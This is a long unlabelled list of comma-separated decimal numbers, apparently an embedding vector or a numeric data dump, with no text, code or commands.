-0.004823895171284676, 0.0174825731664896, -0.003704929491505027, 0.022743532434105873, -0.005637320224195719, 0.04383593425154686, 0.011396047659218311, -0.019619330763816833, -0.044839560985565186, 0.047105822712183, -0.01387274544686079, 0.04098692163825035, -0.014868280850350857, -0.028700556606054306, 0.014625467360019684, 0.016025692224502563, 0.023941412568092346, -0.042735178023576736, 0.05008433386683464, 0.05335422232747078, -0.016147097572684288, 0.0030978957656770945, -0.05157358944416046, 0.01678650826215744, -0.03681052848696709, 0.0473000705242157, 0.012448239140212536, 0.013338555581867695, -0.04574606567621231, -0.055005352944135666, -0.0034155766479671, -0.012423957698047161, -0.02447560243308544, -0.0033366624265909195, -0.004597268998622894, -0.00521239684894681, -0.03222944587469101, 0.01753113605082035, -0.016851257532835007, 0.005151693243533373, -0.04160204902291298, -0.045163314789533615, -0.02756742760539055, 0.0024564634077250957, -0.0215456523001194, 0.0015074672410264611, 0.05406647548079491, -0.019279392436146736, 0.019004203379154205, -0.03655152767896652, 0.012699146755039692, 0.10515443980693817, 0.02583535760641098, 0.02028302103281021, -0.016406100243330002, -0.011598392389714718, -0.0026466671843081713, -0.015200125984847546, 0.00048562700976617634, -0.06002350151538849, -0.027502676472067833, 0.024265162646770477, 0.015208219178020954, 0.01711025834083557, -0.01926320604979992, 0.03739327937364578, -0.00012020533176837489, 0.058598995208740234, -0.04221717640757561, -0.00970444642007351, 0.018923265859484673, -0.02798830345273018, -0.04901595413684845, -0.007923814468085766, 0.004540612455457449, -0.037425655871629715, 0.01100754551589489, 0.0028186601120978594, -0.051282212138175964, 0.011298921890556812, 0.012812459841370583, 0.010861857794225216, -0.008506566286087036, -0.04383593425154686, 0.052998095750808716, -0.010878045111894608, -0.03567739948630333, 0.0019425080390647054, -0.012213519774377346, 0.0252687931060791, -0.015232500620186329, 0.020347772166132927, 0.0017654565162956715, 0.0003771197225432843, 0.0023532675113528967, 0.027713116258382797, 0.017741573974490166, 0.004961489234119654, -0.025624919682741165, -0.031322941184043884, 0.0136623065918684, -0.019554581493139267, 0.0024645570665597916, 0.004309939686208963, 0.015564345754683018, 0.009558758698403835, -0.02266259491443634, -0.02102765068411827, 0.024653665721416473, 0.006325291935354471, -0.021707527339458466, 0.025641106069087982, 0.0003002287994604558, 0.018874702975153923, 0.0031424115877598524, -0.007061826065182686, -0.012585833668708801, -0.015313439071178436, 0.016122817993164062, 0.030206000432372093, -0.008830318227410316, 0.015127281658351421, -0.018486201763153076, 0.004836035892367363, -0.0003146458475384861, -0.015564345754683018, -0.006709746550768614, -0.02630479633808136, 0.02568966895341873, -0.01902039162814617, 0.011355578899383545, -0.027955928817391396, 0.010845670476555824, 0.05079658702015877, 0.006871622521430254, 0.007150857709348202, 0.02327772229909897, -0.0025535887107253075, -0.010894232429564, -0.04888645187020302, -0.009040756151080132, 0.012674865312874317, -0.025058355182409286, -0.001181692467071116, -0.008992193266749382, -0.033929139375686646, -0.038494035601615906, -0.011711704544723034, -0.018453827127814293, 0.016171379014849663, 0.01247252058237791, -0.03681052848696709, -0.03694002702832222, -0.015313439071178436, 0.031161068007349968, 0.02895955741405487, 0.008903161622583866, -0.008312315680086613, -0.008490378968417645, 0.02318059653043747, 0.01777394860982895, -0.003700882662087679, 0.012925772927701473, -0.01777394860982895, -0.015572439879179, 0.009574946016073227, -0.013241429813206196, -0.018130075186491013, 0.013573274947702885, -0.0028368711937218904, -0.01981358230113983, 0.01191404927521944, 0.024135662242770195, 0.04467768594622612, -0.036583900451660156, 0.01673794537782669, -0.015143468976020813, 0.029202371835708618, -0.009396882727742195, -0.0034256938379257917, 0.02020208351314068, 0.013192867860198021, -0.0354507714509964, 0.04205530136823654, -0.02719511277973652, -0.021092399954795837, -0.02938043512403965, 0.043479807674884796, 0.02462128922343254, -0.0018150309333577752, -0.015515782870352268, 0.007749797776341438, 0.01184120588004589, -0.011031826958060265, 0.011137045919895172, 0.001007676124572754, -0.019230829551815987, 0.0546492263674736, 0.030804941430687904, -0.013816088438034058, 0.010861857794225216, -0.07057779282331467, 0.029736561700701714, 0.009890603832900524, -0.02127046324312687, -0.00963160302489996, -0.00767290685325861, -0.052026841789484024, 0.00042391192982904613, 0.002300658030435443, -0.004160204902291298, -0.011039921082556248, -0.0014599162386730313, -0.01740163564682007, -0.032617948949337006, -0.0032051382586359978, -0.019943082705140114, -0.02097908779978752, 0.018081512302160263, -0.008943631313741207, 0.029882248491048813, 0.018405264243483543, -0.015240594744682312, 0.02640192210674286, 0.023196784779429436, 0.025009792298078537, -0.042184799909591675, -0.01879376545548439, 0.004172345623373985, 0.0006313151097856462, -0.045487064868211746, -0.0006930302479304373, 0.013694682158529758, 0.011889767833054066, -0.0038485941477119923, -0.004981724079698324, 0.022775907069444656, -0.007664813194423914, 0.02094671130180359, 0.01382418256253004, 0.019570769742131233, -0.00891125574707985, -0.032099947333335876, 0.01212448813021183, 0.029785124585032463, -0.020072583109140396, -0.033832017332315445, 0.010845670476555824, -0.0428970530629158, 0.0020861728116869926, -0.016025692224502563, 0.0038202658761292696, 0.01617947407066822, -0.0252687931060791, -0.013484243303537369, -0.008328502997756004, -0.006317198276519775, 0.008243518881499767, 0.009356413967907429, -0.015960941091179848, -0.031322941184043884, -0.009566851891577244, -0.01978120766580105, 0.003025051672011614, -0.058501869440078735, 0.03638965263962746, -0.00648312084376812, -0.038073159754276276, 0.0010380278108641505, -0.025252604857087135, -0.027211301028728485, 0.021723715588450432, 0.00041708280332386494, -0.007114436011761427, 0.018178638070821762, -0.04574606567621231, 0.012253988534212112, -0.01599331572651863, -0.0433826819062233, -0.023763349279761314, 0.021788464859128, -0.022873032838106155, 0.01837288960814476, 0.010279105044901371, 0.01879376545548439, -0.015701940283179283, 0.017061695456504822, 0.010683794505894184, -0.04237905144691467, 0.0032273961696773767, 0.008377065882086754, -0.002032551448792219, 0.0012181143974885345, 0.01740163564682007, 0.03713427856564522, 0.03242369741201401, 0.019133703783154488, -0.01916608028113842, -0.00787929818034172, -0.013249523937702179, 0.02392522431910038, -0.0055887578055262566, 0.006721887271851301, 0.0024645570665597916, -0.016058066859841347, -0.00942116416990757, 0.005349990911781788, -0.0036239917390048504, -0.02509072981774807, 0.003830383066087961, -0.012618208304047585, -0.004139970522373915, -0.01767682284116745, 0.04169917479157448, -0.017693011090159416, 0.0036725543905049562, -0.037004780024290085, 0.006361714098602533, 0.01926320604979992, -0.0073451087810099125, -0.03904441371560097, 0.02685517445206642, -0.029720373451709747, 0.05358084663748741, 0.04736482352018356, -0.04163442179560661, 0.005750633310526609, 0.011598392389714718, -0.02858724445104599, 0.029202371835708618, -0.01869663968682289, -0.01902039162814617, -0.032990261912345886, 0.02568966895341873, -0.024232788011431694, -0.04603744298219681, -0.02881387062370777, 0.04736482352018356, 0.007539359387010336, -0.010392418131232262, 0.0020689733792096376, -0.03379964083433151, 0.03311976417899132, -0.021561840549111366, 0.011031826958060265, 0.02402235008776188, -0.002849011914804578, 0.06203075870871544, -0.009623508900403976, -0.006612621247768402, 0.032957885414361954, -0.019133703783154488, 0.003045286051928997, 0.03969191387295723, -0.008482284843921661, -0.021529464051127434, 0.01720738410949707, 0.009518289938569069, -0.014018433168530464, 0.006313151214271784, -0.050990838557481766, 0.021060025319457054, -0.012262082658708096, -0.007729563396424055, -0.0176282599568367, -0.004008446354418993, 0.026547610759735107, 0.01740163564682007, -0.0031201536767184734, 0.003219302510842681, 0.019247017800807953, -0.019279392436146736, -0.007243936415761709, -0.0036907654721289873, 0.014908749610185623, -0.03454427048563957, 0.012788178399205208, 0.00538641307502985, -0.02831205539405346, -0.0355478972196579, -0.030416438356041908, 0.007365343160927296, -0.037425655871629715, 0.01613091118633747, 0.03613065183162689, 0.014860186725854874, 0.02211221680045128, -0.05772486701607704, -0.023811912164092064, -0.05633273348212242, -0.005851805675774813, -0.017757762223482132, 0.021157151088118553, 0.049922458827495575, 0.008959818631410599, -0.0195383932441473, -0.0034742567222565413, -0.002169134095311165, 0.006908044219017029, -0.02229028008878231, 0.028522493317723274, 0.008733192458748817, -0.012990523129701614, 0.012051643803715706, 0.03357301652431488, 0.007826688699424267, 0.02565729431807995, 0.004540612455457449, -0.03031931445002556, -0.0002825236297212541, 0.009283569641411304, -0.007009216584265232, -0.01861570216715336, -0.0038243127055466175, 0.004900786094367504, 0.01735307276248932, 0.00578300841152668, 0.035515524446964264, -0.013338555581867695, -0.05095846205949783, -0.0003551147528924048, -0.030044125393033028, -0.01940889284014702, -0.02826349250972271, 0.02365003526210785, 0.020315397530794144, 0.002032551448792219, 0.0019172150641679764, -0.03969191387295723, 0.00626054173335433, -0.03813790902495384, 0.00443134643137455, 0.0026648782659322023, 0.018955640494823456, 0.017466384917497635, -0.012796271592378616, -0.002043680287897587, 0.01156601682305336, -0.0015236547915264964, -0.018340513110160828, 0.0033407092560082674, -0.011080389842391014, -0.026515236124396324, 0.006398135796189308, 0.01981358230113983, 0.006264588795602322, 0.03237513452768326, -0.010967076756060123, -0.042411427944898605, 0.027826428413391113, -0.04733244702219963, -0.027729302644729614, -0.039853792637586594, -0.0032820291817188263, -0.003613874316215515, -0.004540612455457449, -0.011031826958060265, -0.01426934078335762, -0.013727056793868542, 0.0021327119320631027, 0.03344351425766945, -0.009623508900403976, -0.011485079303383827, -0.017450198531150818, -0.005710164550691843, 0.03069162741303444, 0.0216427780687809, -0.009842040948569775, 0.007377483882009983, 0.017466384917497635, 0.01048954389989376, -0.010206261649727821, -0.03706952929496765, -0.008547035977244377, 0.03294169902801514, 0.004212814383208752, -0.024702228605747223, 0.005948930978775024, -0.01585572212934494, 0.0509260855615139, 0.0128043657168746, -0.004415159113705158, -0.024928852915763855, 0.035418398678302765, -0.036163024604320526, 0.03502989560365677, -0.027130363509058952, 0.012780084274709225, 0.004032727796584368, -0.0002913762000389397, -0.010619044303894043, 0.005693976767361164, 0.006167463026940823, -0.01978120766580105, 0.012132581323385239, 0.019829770550131798, 0.008409441448748112, 0.0013061343925073743, 0.023391034454107285, 0.001964766066521406, 0.02504216693341732, -0.0005417776410467923, 0.0009398906258866191, 0.011015639640390873, 0.02186940424144268, -0.02149708941578865, -0.00572230527177453, -0.0069930292665958405, 0.010343855246901512, 0.01664081960916519, -0.02593248337507248, -0.006640949286520481, -0.012148769572377205, -0.02481554076075554, 0.035612646490335464, -0.024265162646770477, -0.02288922108709812, 0.011371766217052937, 0.027826428413391113, -0.019554581493139267, -0.02365003526210785, -0.008081642910838127, 0.03286076337099075, -0.004002375993877649, -0.007822642102837563, 0.004144017118960619, -0.0018666288815438747, -0.015888096764683723, -0.016916008666157722, 0.0015621002530679107, -0.028376804664731026, -0.01991070806980133, 0.004949348513036966, 0.0395624153316021, 0.00930785108357668, -0.023811912164092064, 0.012189238332211971, -0.015920473262667656, -0.020266834646463394, 0.01529725082218647, 0.04079267010092735, -0.0028308008331805468, -0.012885303236544132, 0.05005195736885071, -0.014245059341192245, -0.003917391411960125, -0.026466673240065575, 0.0015459127025678754, 0.025754420086741447, 0.003178833518177271, -0.03480327129364014, 0.02340722270309925, 0.0028186601120978594, 0.0002340874052606523, 0.06183650717139244, 0.004609409719705582, 0.009081224910914898, 0.02764836512506008, 0.0670812800526619, -0.004435393493622541, -0.013500431552529335, 0.0006985947256907821, 0.021060025319457054, -0.039530038833618164, -0.002341127023100853, -0.028425367549061775, 0.012464426457881927, 0.019182266667485237, 0.005613038782030344, -0.020962899550795555, -0.027081800624728203, -0.03768465667963028, -0.027081800624728203, 0.003963930532336235, 0.008207096718251705, -0.039530038833618164, 0.006009634584188461, 0.01916608028113842, 0.032116133719682693, -0.027761677280068398, -0.011598392389714718, -0.035839274525642395, -0.013411399908363819, 0.0012798295356333256, -0.016381818801164627, 0.02806924097239971, -0.03431764245033264, -0.00029972291667945683, -0.005770867690443993, -0.0027174879796802998, 0.008105924353003502, 0.026822799816727638, -0.023488160222768784, -0.016705568879842758, 0.008016892708837986, 0.029348060488700867, 0.021092399954795837, -0.03171144425868988, 0.0395624153316021, 0.02667711116373539, -0.013184773735702038, -0.012763896957039833, -0.017385447397828102, -0.012933866120874882, -0.005766821093857288, -0.02102765068411827, -0.0032051382586359978, -0.009777290746569633, -0.018178638070821762, 0.005714211147278547, -0.007478656247258186, 0.001424505957402289, 0.011226077564060688, -0.030999191105365753, 0.0508289597928524, -0.00881412997841835, -0.004350408911705017, -0.013443774543702602, -0.003880969248712063, 0.019943082705140114, -0.021351400762796402, -0.005693976767361164, 0.025527793914079666, -0.012456333264708519, -0.026272421702742577, -0.0034499752800911665, -0.009801572188735008, 0.01399415172636509, 0.013977964408695698, -0.014479778707027435, -0.01790344901382923, -0.01167932990938425, 0.027211301028728485, 0.005147646646946669, 0.014908749610185623, 0.03218088299036026, 0.005370225291699171, -0.002124618273228407, 0.00044515810441225767, 0.028991933912038803, -0.003045286051928997, 0.0031282473355531693, -0.029914624989032745, 0.016754131764173508, 0.007341061718761921, -0.029720373451709747, -0.013411399908363819, 0.006997075863182545, -0.004277564585208893, -0.005297381430864334, 0.0015408541075885296, 0.00118371588177979, -0.0013708845945075154, 0.015920473262667656, 0.019036579877138138, 0.019198454916477203, -0.0007810501265339553, -0.010845670476555824, 0.006390042137354612, -0.02206365391612053, -0.05704498663544655, 0.014957312494516373, -0.011112765409052372, -0.0006070337840355933, 0.0036462496500462294, -0.031031565740704536, 0.011606485582888126, 0.014285528101027012, 0.007272264454513788, 0.01715882122516632, -0.009315945208072662, 0.0025960810016840696, -0.03600114956498146, -0.024977415800094604, 0.00482794176787138, 0.01864807680249214, -0.01224589440971613, 0.010416699573397636, -0.014941124245524406, -0.008441816084086895, -0.007361296098679304, -0.0036907654721289873, -0.013087647967040539, 0.019570769742131233, 0.008267800323665142, -0.0020942664705216885, -0.009453539736568928, -0.008057361468672752, 0.02233884297311306, 0.00443134643137455, -0.007187279872596264, -0.01455262303352356, 0.0029157856479287148, -0.008288034237921238, 0.015143468976020813, -0.021302837878465652, -0.02303490787744522, 0.008636067621409893, 0.0087412865832448, -0.0060136811807751656, -0.00393964909017086, 0.004411112051457167, 0.01617947407066822, -0.0049412548542022705, -0.0030331453308463097, 0.00679877819493413, 0.01387274544686079, -0.007247983478009701, 0.007838829420506954, 0.004799613729119301, 0.012156862765550613, -0.03227800875902176, -0.013565181754529476, -0.011816924437880516, -0.02280828170478344, -0.011792642995715141, 0.013322368264198303, -0.0073734368197619915, -0.02457272633910179, -0.0005068731843493879, 0.004350408911705017, -0.002887457376345992, -0.02531735599040985, 0.006511448882520199, -0.04030704125761986, 0.011088483966886997, 0.002940066857263446, -0.033929139375686646, 0.03800840675830841, -0.00001354760297544999, -0.022533094510436058, 0.0013648142339661717, 0.010983264073729515, -0.017644448205828667, 0.044515810906887054, -0.03603352606296539, -0.00867653638124466, -0.020509647205471992, 0.014026527293026447, -0.002917808946222067, -0.02769692800939083, -0.014601185917854309, -0.01140414085239172, 0.01893945410847664, -0.023374848067760468, -0.02117333747446537, -0.018809953704476357, -0.04237905144691467, -0.009429258294403553, 0.0035814992152154446, -0.030853504315018654, 0.028700556606054306, -0.012286363169550896, 0.012820553034543991, 0.043674055486917496, -0.019182266667485237, 0.017595885321497917, 0.008992193266749382, 0.030011750757694244, -0.026418110355734825, -0.014180309139192104, 0.05205921828746796, -0.035709772258996964, -0.006406229920685291, 0.015823347494006157, -0.038267407566308975, 0.008895068429410458, -0.045033812522888184, 0.0069039976224303246, -0.010384324006736279, 0.016066160053014755, 0.007774079218506813, -0.03344351425766945, -0.006802825257182121, 0.0015722174430266023, 0.006377901416271925, -0.019667893648147583, 0.011590298265218735, 0.025204041972756386, -0.005443069618195295, -0.03379964083433151, 0.018729016184806824, -0.03101537935435772, 0.009753009304404259, -0.006819012574851513, -0.038914911448955536, -0.018729016184806824, -0.01940889284014702, -0.007421999704092741, -0.05248009413480759, -0.007106341887265444, -0.002521213609725237, 0.023439597338438034, 0.03399389237165451, 0.011396047659218311, 0.029558498412370682, -0.0354507714509964, -0.005406647454947233, -0.012512989342212677, 0.016009503975510597, 0.014334090985357761, -0.029412809759378433, 0.001599533949047327, 0.0059853531420230865, -0.03389676660299301, -0.022694969549775124, 0.03156575560569763, 0.01884232833981514, -0.006984935142099857, -0.05345134809613228, -0.03447951748967171, -0.001492291339673102, -0.016203755512833595, -0.014447404071688652, 0.014002245850861073, 0.0004067126428708434, 0.0018969805678352714, 0.0009560781763866544, -0.005770867690443993, 0.00665713706985116, 0.005248818546533585, 0.008336597122251987, 0.0065964339300990105, 0.0007142763934098184, -0.006333385594189167, -0.006377901416271925, 0.03188950940966606, -0.019052766263484955, -0.009623508900403976, -0.03213232010602951, -0.02248453162610531, -0.012181144207715988, 0.008757473900914192, 0.009785384871065617, -0.013144304975867271, 0.005171927623450756, 0.026984674856066704, 0.027826428413391113, -0.011622673831880093, -0.04396543279290199, 0.008057361468672752, -0.029493747279047966, -0.011622673831880093, 0.013111929409205914, -0.014277433976531029, -0.00897600594907999, -0.028198743239045143, -0.023795723915100098, -0.0018716874765232205, 0.004601316060870886, -0.017466384917497635, -0.005001958459615707, 0.005224537570029497, -0.025382105261087418, 0.004040821455419064, 0.0022804236505180597, -0.02793974056839943, -0.004633691161870956, -0.012796271592378616, -0.000745133962482214, -0.001470033428631723, 0.02881387062370777, -0.0038222894072532654, 0.013306180015206337, 0.0046984413638710976, 0.01827576383948326, -0.00841753464192152, -0.012456333264708519, -0.008385160006582737, -0.00846609752625227, -0.00012197584874229506, 0.0059044151566922665, 0.03031931445002556, -0.0002842941612470895, -0.013022897765040398, -0.004241142421960831, 0.009170256555080414, 0.01958695612847805, -0.02097908779978752, -0.0032901230733841658, 0.0039942823350429535, -0.036486778408288956, 0.01303099188953638, 0.04053366929292679, 0.015094907023012638, -0.006236260291188955, 0.006135087925940752, 0.023164408281445503, -0.0015145492507144809, -0.011315109208226204, -0.011226077564060688, -0.0128043657168746, -0.011258453130722046, -0.0024787213187664747, -0.05241534486413002, -0.022468343377113342, -0.031274378299713135, -0.013654213398694992, -0.03255319967865944, 0.00170778832398355, 0.012909584678709507, 0.024006161838769913, 0.020024020224809647, 0.025009792298078537, -0.014261246658861637, -0.011687424033880234, -0.012691052630543709, 0.0025232371408492327, -0.018308138474822044, 0.017191195860505104, -0.044289182871580124, -0.0016096512554213405, 0.0028368711937218904, -0.02685517445206642, -0.023099659010767937, 0.002054809359833598, 0.007138716988265514, 0.00970444642007351, -0.0006227155099622905, -0.047170571982860565, -0.0008473179768770933, -0.025301167741417885, -0.018032949417829514, -0.01711025834083557, 0.0022662593983113766, -0.024410851299762726, -0.001643038121983409, -0.009283569641411304, -0.0007638508104719222, 0.002171157393604517, -0.016576068475842476, 0.007972377352416515, -0.011201797053217888, 0.0011786572868004441, 0.002849011914804578, -0.039950914680957794, 0.028198743239045143, -0.009882509708404541, 0.021885590627789497, -0.028846245259046555, -0.008603692054748535, -0.021885590627789497, -0.0699302926659584, 0.0034115298185497522, -0.0033488029148429632, 0.03460901975631714, -0.013565181754529476, 0.023051096126437187, 0.006280776113271713, 0.016899820417165756, -0.06173938140273094, 0.02565729431807995, -0.030804941430687904, 0.0035794759169220924, 0.004200673662126064, 0.016219941899180412, -0.01594475470483303, 0.01422077789902687, -0.007515077944844961, -0.008644160814583302, 0.012294457294046879, 0.02965562418103218, 0.0045891753397881985, -0.001770515227690339, 0.0031909742392599583, 0.01698075793683529, 0.0197326447814703, 0.033929139375686646, -0.008000705391168594, 0.017013132572174072, 0.015588627196848392, 0.029963187873363495, 0.004184486344456673, 0.015782877802848816, 0.0052933343686163425, 0.00722774863243103, -0.01642228662967682, -0.006491214502602816, 0.029963187873363495, -0.017450198531150818, -0.010756638832390308, 0.017094071954488754, 0.006895903497934341, 0.019522206857800484, -0.05147646367549896, -0.013735150918364525, -0.011646954342722893, -0.0006763368146494031, 0.010109135881066322, 0.021189525723457336, 0.0011088483734056354, 0.025495419278740883, 0.002940066857263446, -0.013387118466198444, 0.05296571925282478, -0.026369547471404076, 0.0010223460849374533, -0.01804913766682148, 0.005204302724450827, -0.00775384483858943, 0.050019584596157074, -0.0021954388357698917, -0.005867992993444204, -0.01735307276248932, 0.022840658202767372, -0.014803530648350716, -0.030465001240372658, -0.04076029360294342, -0.018923265859484673, 0.010958983562886715, -0.007049685809761286, 0.006296963896602392, 0.015888096764683723, 0.0010430864058434963, -0.008385160006582737, -0.0073005929589271545, 0.004981724079698324, -0.015256782062351704, 0.02789117768406868, -0.030303126201033592, -0.016818882897496223, -0.02429753914475441, -0.01116942148655653, -0.019376518204808235, 0.017612073570489883, 0.003332615364342928, -0.04445106163620949, 0.0009960412280634046, -0.01053810678422451, -0.012602020986378193, -0.005370225291699171, -0.008114018477499485, -0.017612073570489883, -0.017272135242819786, -0.016721757128834724, -0.01347615011036396, -0.023909036070108414, 0.02219315432012081, 0.0195383932441473, 0.09349939227104187, 0.020024020224809647, -0.00014821741206105798, 0.0017816441832110286, -0.000831130426377058, -0.001204962027259171, 0.001441705273464322, 0.01184120588004589, 0.02387666143476963, 0.00970444642007351, 0.014172215014696121, -0.000897904101293534, 0.010554294101893902, 0.011557922698557377, -0.018583327531814575, 0.0037717032246291637, -0.009753009304404259, -0.005483538378030062, 0.008959818631410599, 0.02429753914475441, 0.002713440917432308, 0.018858516588807106, 0.017450198531150818, -0.008170674555003643, -0.0058598993346095085, -0.021998904645442963, 0.007871204987168312, -0.021140962839126587, -0.03180857002735138, -0.007094201166182756, 0.007794313598424196, -0.02196652814745903, -0.031339131295681, 0.011485079303383827, 0.00775384483858943, 0.012626302428543568, 0.02243596874177456, 0.011185608804225922, 0.0007795325363986194, 0.00012007886834908277, 0.002911738585680723, -0.00465392554178834, 0.00033968599746003747, -0.018502390012145042, 0.0029704186599701643, -0.013654213398694992, 0.01545912679284811, 0.01359755638986826, -0.017806323245167732, -0.0015600768383592367, -0.0035774523857980967, -0.010619044303894043, 0.008243518881499767, 0.057530615478754044, -0.022079842165112495, 0.010967076756060123, -0.018712827935814857, 0.009793478064239025, -0.017919637262821198, -0.02224171720445156, 0.018631890416145325, 0.011420329101383686, 0.013281898573040962, 0.032342758029699326, 0.0008458003867417574, -0.018405264243483543, -0.020914336666464806, 0.02290540747344494, 0.020444897934794426, 0.0178225114941597, 0.003067543962970376, 0.016195660457015038, 0.012423957698047161, -0.010683794505894184, 0.01864807680249214, 0.030254563316702843, -0.0031282473355531693, 0.002062903018668294, -0.034673769026994705, -0.0030554032418876886, 0.03512702137231827, 0.0273246131837368, -0.011509360745549202, 0.01735307276248932, -0.0013617790536955, 0.004026657436043024, -0.01743401028215885, 0.023957598954439163, -0.0017320697661489248, -0.020687710493803024, -0.0025738233234733343, -0.01545912679284811, 0.0043908776715397835, 0.0022015091963112354, 0.013451868668198586, -0.013022897765040398, -0.004447534214705229, -0.02653142251074314, 0.000985418213531375, -0.00031186360865831375, -0.016770320013165474, -0.00958304014056921, 0.021335214376449585, 0.003132294397801161, -0.03493276983499527, 0.01128273457288742, 0.015402470715343952, 0.011655048467218876, -0.004156157840043306, 0.01515965722501278, -0.027292238548398018, 0.008170674555003643, 0.01307955477386713, -0.01518393773585558, 0.0010400512255728245, -0.016592256724834442, -0.0036968355998396873, 0.016025692224502563, 0.0024220647756010294, -0.023196784779429436, -0.01056238729506731, -0.005940837319940329, 0.0427999272942543, -0.039853792637586594, -0.014746873639523983, -0.020266834646463394, -0.029461372643709183, -0.024378476664423943, 0.032957885414361954, 0.05413122475147247, 0.0235529113560915, 0.034123390913009644, 0.016260411590337753, -0.03286076337099075, 0.0352565199136734, -0.012666771188378334, 0.0505375862121582, -0.006025821901857853, 0.020396335050463676, -0.01636563055217266, 0.010918513871729374, 0.02960706129670143, 0.01586381532251835, 0.019473643973469734, 0.01688363216817379, 0.0023512442130595446, -0.009202632121741772, 0.022452155128121376, 0.0032375133596360683, 0.02989843674004078, -0.01580715924501419, -0.011598392389714718, 0.02578679472208023, 0.037425655871629715, 0.010060572996735573, -0.0029016213957220316, -0.004803660791367292, -0.011104671284556389, 0.001511514070443809, 0.003502584993839264, -0.030108874663710594, 0.016487037762999535, 0.03745803236961365, -0.026272421702742577, -0.017450198531150818, 0.021043837070465088, 0.003478303551673889, -0.0657215267419815, -0.031403880566358566, -0.0197326447814703, 0.012067831121385098, 0.00827994104474783, -0.029412809759378433, -0.004738910123705864, 0.017514947801828384, 0.007280358579009771, -0.022549280896782875, -0.009202632121741772, -0.009680164977908134, -0.011606485582888126, -0.0005276135052554309, 0.004791520070284605, -0.024362288415431976, -0.006584293209016323, 0.014771155081689358, 0.0008887986186891794, 0.03451189398765564, -0.005685883108526468, -0.004649878945201635, 0.014771155081689358, 0.01660844497382641, 0.008603692054748535, -0.0233586598187685, -0.004216861445456743, -0.03940054029226303, -0.0013870721450075507, 0.009210726246237755, -0.01410746481269598, 0.02112477459013462, -0.028133992105722427, 0.002674995455890894, 0.009461632929742336, 0.0018898984417319298, -0.0273246131837368, 0.018955640494823456, -0.020736273378133774, 0.01105610840022564, 0.011412234976887703, -0.017498759552836418, -0.01156601682305336, -0.015451032668352127, -0.000810895930044353, 0.0025009792298078537, 0.007438187021762133, 0.013209055177867413, 0.02387666143476963, 0.013492337428033352, -0.030756378546357155, -0.015038250014185905, 0.011808830313384533, -0.013136210851371288, 0.015386282466351986, 0.01926320604979992, 0.007167045492678881, -0.028878619894385338, 0.005738492589443922, 0.035612646490335464, 0.0019779184367507696, -0.012763896957039833, -0.008797942660748959, 0.016624631360173225, 0.011760267429053783, 0.03645440191030502, 0.0006773485220037401, 0.02010495774447918, 0.008530847728252411, 0.0007092177984304726, -0.0007041592034511268, 0.01252108346670866, -0.034673769026994705, 0.0006535730208270252, -0.01730450987815857, -0.042735178023576736, 0.004977677017450333, 0.001492291339673102, -0.00023041990061756223, 0.016009503975510597, 0.025867732241749763, -0.018761390820145607, 0.006098666228353977, -0.0032698886934667826, 0.020493460819125175, 0.019052766263484955, -0.0036442261189222336, 0.0006404206505976617, 0.0273246131837368, 0.02094671130180359, -0.01296624168753624, 0.021998904645442963, -0.006390042137354612, 0.006742121651768684, -0.004184486344456673, -0.011104671284556389, -0.001838300609961152, -0.02615910954773426, 0.001927332254126668, -0.01571812853217125, -0.01476306188851595, -0.0058153835125267506, -0.009048850275576115, -0.010117230005562305, 0.0064547923393547535, 0.003243583720177412, 0.015394376590847969, -0.019295580685138702, 0.0065964339300990105, -0.014115558937191963, -0.006333385594189167, -0.023892849683761597, 0.002820683643221855, -0.0047146291472017765, 0.037328530102968216, -0.009793478064239025, -0.026547610759735107, -0.016114722937345505, 0.0068230596370995045, -0.001993094338104129, -0.019247017800807953, -0.018065325915813446, -0.030238375067710876, -0.010950889438390732, 0.0034924675710499287, -0.007895486429333687, -0.014803530648350716, -0.011954518035054207, 0.0064102765172719955, -0.03091825358569622, 0.04205530136823654, -0.02615910954773426, 0.00040013642865233123, 0.008498473092913628, 0.004044868517667055, -0.004726769868284464, 0.022921595722436905, -0.007693141233175993, -0.002276376588270068, -0.01082138903439045, -0.017450198531150818, 0.0146173732355237, 0.01859951578080654, 0.03282838687300682, -0.013370930217206478, -0.0193927064538002, -0.01307955477386713, 0.00276402710005641, 0.000021767851649201475, -0.0016986828995868564, 0.02373097464442253, 0.008085689507424831, -0.012302551418542862, 0.02131902612745762, 0.00005049130049883388, -0.01968408189713955, -0.036357276141643524, -0.00651549594476819, -0.00818281527608633, -0.011930237524211407, 0.013306180015206337, 0.01354899350553751, 0.006632855627685785, 0.028457744047045708, 0.019036579877138138, 0.006928279064595699, -0.009194537997245789, -0.00039103091694414616, 0.0005362131632864475, 0.007061826065182686, 0.019247017800807953, -0.0005357072805054486, -0.014131746254861355, -0.008186861872673035, 0.017094071954488754, -0.023811912164092064, -0.024216601625084877, 0.006604527588933706, -0.017077883705496788, 0.032537009567022324, 0.005746586248278618, 0.014010339975357056, 0.0021145010832697153, -0.030756378546357155, 0.0028530587442219257, -0.023941412568092346, 0.011226077564060688, 0.025479231029748917, 0.011978799477219582, 0.021060025319457054, -0.021901778876781464, 0.014512154273688793, -0.021367589011788368, -0.0066530900076031685, -0.0034519988112151623, 0.005313569214195013, -0.003769679693505168, -0.01879376545548439, 0.036907654255628586, -0.0036523197777569294, 0.0012504896149039268, 0.019522206857800484, -0.015572439879179, -0.0027053472585976124, -0.01116942148655653, -0.008304222486913204, 0.019667893648147583, 0.0005081378621980548, 0.02340722270309925, 0.007082060910761356, -0.0025535887107253075, -0.018826140090823174, 0.005171927623450756, -0.005171927623450756, 0.004123782739043236, 0.016025692224502563, 0.0025353776291012764, -0.02607817016541958, -0.0176282599568367, -0.02928330935537815, 0.030724002048373222, 0.016543693840503693, -0.004694394767284393, 0.0013749315403401852, 0.0013202984118834138, 0.0014538458781316876, 0.03684290498495102, -0.0011402118252590299, -0.009939166717231274, -0.006908044219017029, 0.013120023533701897, -0.012610115110874176, 0.0011907978914678097, -0.00010446039232192561, -0.0010344866896048188, -0.015086812898516655, 0.01296624168753624, -0.0025798934511840343, 0.010619044303894043, -0.008757473900914192, -0.010392418131232262, 0.021756090223789215, -0.0060298689641058445, 0.02224171720445156, 0.01683506928384304, 0.0005655531422235072, -0.0045608473010361195, -0.009744915179908276, -0.014860186725854874, 0.01112085860222578, -0.003215255681425333, 0.0005291310953907669, -0.004771285690367222, -0.009170256555080414, -0.011590298265218735, -0.01594475470483303, -0.025948669761419296, 0.016567975282669067, 0.00411568908020854, 0.014560717158019543, -0.03629252687096596, 0.02020208351314068, 0.018178638070821762, 0.004795566666871309, 0.036583900451660156, 0.0036280385684221983, -0.0025495418813079596, 0.012577739544212818, -0.016519412398338318, -0.013281898573040962, 0.002828777302056551, 0.018243389204144478, -0.018032949417829514, 0.0012808413011953235, 